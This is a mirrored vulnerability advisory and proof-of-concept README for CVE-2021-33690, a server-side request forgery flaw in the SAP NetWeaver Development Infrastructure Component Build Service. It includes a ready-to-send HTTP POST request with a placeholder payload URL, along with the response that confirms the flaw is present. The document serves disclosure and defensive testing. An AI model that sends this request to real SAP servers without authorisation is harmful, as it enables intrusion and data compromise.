Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-33690 PoC — SAP NetWeaver 代码问题漏洞

Source
https://github.com/redrays-io/CVE-2021-33690
Associated Vulnerability
Title:SAP NetWeaver 代码问题漏洞 (CVE-2021-33690)
Description:Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.
Description
[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure
Readme
# CVE-2021-33690
[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure
```
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955 
SAP Approved Fixes: True
Status: analyzed and published

ADVISORY INFORMATION
Title: [CVE-2021-33690] Server-Side Request Forgery Vulnerability in SAP NetWeaver Development Infrastructure
Risk: Critical
Advisory URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Date published: June 1, 2023

VULNERABILITY INFORMATION
Remotely Exploitable: Yes
Locally Exploitable: No

CVSS Information
CVSS v3.1 Base Score: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

VULNERABILITY DESCRIPTION
A vulnerability known as Server-Side Request Forgery (SSRF) has been identified in various versions of the 
SAP NetWeaver Development Infrastructure Component Build Service, namely 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50.
This weakness within the SAP NetWeaver Development Infrastructure Component Build Service gives an attacker,
who has server access, the ability to execute proxy attacks via specially tailored queries. The aftermath of 
such attacks can lead to the complete compromise of sensitive server data, affecting its accessibility. 
It’s crucial to note that the severity of this vulnerability is contingent on whether the SAP NetWeaver 
Development Infrastructure (NWDI) operates on the intranet or the internet. The CVSS score has been calculated based 
on the worst-case situation, which presumes it operates online.

TECHNICAL DESCRIPTION

To determine if the server is vulnerable to SSRF, send the following request:

POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE

If the following response is received, it implies the presence of the vulnerability:

<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>


About RedRays
RedRays is a premier cybersecurity enterprise that safeguards ERP systems against internal fraudulent 
activities and external cyber threats. We take pride in delivering robust security solutions for large 
corporations and managed service providers that depend on major ERP systems like SAP, Oracle, and Microsoft. 
Utilizing advanced tools and strategies, we proactively supervise and control security in extensive 
SAP environments globally.

Our primary goal is to bridge the security gap from both a technical and business perspective, ensuring our 
clients’ seamless operations and safeguarding their precious data. We at RedRays, are committed to upholding
top-tier security standards while providing extraordinary client service and assistance.

About RedRays R&D
The cornerstone of RedRays’ accomplishments lies in our research and development (R&D) unit, specializes in 
studying and analyzing vulnerabilities in essential corporate applications. Our R&D initiatives have earned 
acknowledgment and admiration from leading software firms such as SAP, Oracle, Microsoft Dynamics, and IBM.
This dedication to research enables us to anticipate emerging threats and craft bespoke security solutions
that cater to our clients’ needs.

Our team comprises seasoned professionals with diverse skill sets spanning various security domains, 
such as vulnerability evaluation, penetration testing, incident management, and threat intelligence. 
Our commitment is to perform rigorous research and deliver avant-garde solutions to fortify SAP systems 
against ever-changing threats.
```

## Contact RedRays

For any questions or further details, don't hesitate to reach out:

* [GitHub](https://github.com/redrays-io)
* [Email](mailto:vahagn@redrays.io)
* [Website](https://www.redrays.io?gh)
File Snapshot

 [4.0K]  /data/pocs/bb54d9ba1920c8acc60e73d88dc523cead60a88b
└── [4.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →